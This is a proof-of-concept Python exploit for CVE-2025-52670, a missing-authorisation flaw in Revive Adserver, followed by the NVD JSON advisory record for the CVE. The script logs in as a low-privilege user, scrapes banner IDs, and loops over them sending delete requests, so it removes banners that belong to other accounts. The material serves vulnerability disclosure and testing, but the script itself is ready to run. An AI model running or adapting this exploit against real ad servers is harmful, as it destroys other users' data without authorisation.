CVE-2025-52670

# CVE-2025-52670 PoC - Revive Adserver Authorization Bypass # Missing authorization check allows deletion of other users' banners import requests import re TARGET_URL = "http://target-server/revive-adserver" USERNAME = "attacker" PASSWORD = "password123" def login(): """Authenticate and get session cookie""" session = requests.Session() login_url = f"{TARGET_URL}/account-login.php" data = { "username": USERNAME, "password": PASSWORD } session.post(login_url, data=data) return session def get_other_user_banner_id(session): """Enumerate banner IDs owned by other users""" banners_url = f"{TARGET_URL}/banner-edit.php" response = session.get(banners_url) # Extract banner IDs from page content banner_ids = re.findall(r'bannerid=(\d+)', response.text) return banner_ids def delete_banner(session, banner_id): """Delete banner without proper authorization check""" delete_url = f"{TARGET_URL}/banner-delete.php" data = { "bannerid": banner_id, "confirm": "true" } response = session.post(delete_url, data=data) return response.status_code == 200 def main(): session = login() banner_ids = get_other_user_banner_id(session) for banner_id in banner_ids: if delete_banner(session, banner_id): print(f"Successfully deleted banner {banner_id} owned by other user") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-52670", "sourceIdentifier": "[email protected]", "published": "2025-11-20T20:16:23.280", "lastModified": "2025-12-02T20:17:35.453", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing authorization check in Revive Adserver 5.5.2 and 6.0.1 and earlier versions causes users on the system to delete banners owned by other accounts"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:revive-adserver:revive_adserver:*:*:*:*:*:*:*:*", "versionEndIncluding": "5.5.2", "matchCriteriaId": "47AC2D81-BA0C-404A-B6F6-31151956D422"}, {"vulnerable": true, "criteria": "cpe:2.3:a:revive-adserver:revive_adserver:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0.0", "versionEndIncluding": "6.0.1", "matchCriteriaId": "42E4B7BD-5F7B-4FBE-93D2-C19F30FA5A51"}]}]}], "references": [{"url": "https://hackerone.com/reports/3401612", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}